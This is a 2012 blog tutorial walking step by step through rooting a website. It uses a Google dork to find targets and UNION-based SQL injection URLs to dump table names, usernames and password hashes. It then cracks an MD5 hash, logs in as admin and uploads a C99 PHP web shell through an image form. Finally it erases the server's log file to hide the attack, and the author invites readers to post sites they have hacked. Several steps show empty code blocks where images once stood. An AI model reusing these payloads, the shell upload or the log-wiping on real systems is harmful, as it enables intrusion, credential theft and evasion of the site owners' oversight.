Home Unlabelled Advanced SQL Injection Part 1: Complete website rooting tutorial

Advanced SQL Injection Part 1: Complete website rooting tutorial

By
Friday, August 24, 2012
Read
Add Comment
Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Browser. Its a long post that i've made. So have Patience to learn it considering my Patience to make it for you all. :D

What all you need
'''''''''''''''''''''''''''''''''''
1.  PATIENCE, PATIENCE & PATIENCE :P

  
2. Mantra Browser (Best Browser For Hackers)



3. A Admin Finder Tool



4. Any PHP Shell you are comfortable with (my personal choice C99)

Download from here: http://www.sh3ll.org/


5. Google Dork to find SQLi Vulnerable sites:

allinurl:.php?id=
.
.
.
.
Now the process
'''''''''''''''''''''''''''''''

Step 1:

I'm on the home page of the website now


Code:



Step 2:

I went through all the pages of web site and found a page with URL input


Code:



Step 3:

I launched Hackbar by pressing F9



Step 4:

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.


Code:


Since the page content is different from the previous one. I can make sure that the web page is vulnerable.


Step 5:

Lets find out the number of tables


Code:



Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage


Code:




Step 7:

I went up to 7 and no change till now


Code:




Step 8:

I'm on 8 now and I can see the page changed


Code:




Step 9:

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT




Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables




Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7





Step 12:

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7


The current user is cms_user@localhost



Step 13:

Lets find out the version of the database. I replaced 2 in the URL with version() command


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7


5.0.45 is the version



Step 14:

Let me list all the tables


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables


From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and its a big list


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns




Step 16:

I want columns from the table "user" and nothing else


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'




Step 17:

Lets find the user name


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user




Step 18:

Now, what about password


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user


Its encrypted



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com




Step 20:

Voila.!!! I got the password




Step 21:

Finding the log in page. Its was right in front of me


NB: You can find it by Admin Finder tool kit that I've mentioned above. Just copy-paste the URL on Web Admin Finder v2.0 & Start searching.


Step 22:

Logging in with the credentials I have




Step 23:

Greetings.!!!




Step 24:

I'm an admin now. Look at my powers.




Step 25:

Let me add an event




Step 26:

and of course I want to upload a picture




Step 27:

Lets see it allows me to upload the shell or not




Step 28:

Now I'm pressing on "Add Event" button




Step 29:

Nice. Looks like it's got uploaded




Step 30:

Let's see where the shell got uploaded to




Step 31:

I'm trying to get the default upload location





Step 32:

Looks like I got it


Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access




Step 34:

I simply clicked on the up button to get the root folder


Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial



Step 35:

What I'm interested is the log folder





Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks




Step 37:

Let me go back and edit the log file





Step 38:

I deleted complete log entries. Now saving it.




Step 39:

Nice. Log file is empty now



Step 40:

Now. Lets remove the c99 shell by pressing on Self Remove




Step 41:

Confirmed.!!!




Step 42:

OK. Good Bye C99



Step 43:

Well. It got deleted itself


  
So thats it for tonight. I hope all of you will be successful with this tutorial. Please submit your hacked site by Advanced SQL Injection under this post.

Happy Hacking.!!!
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us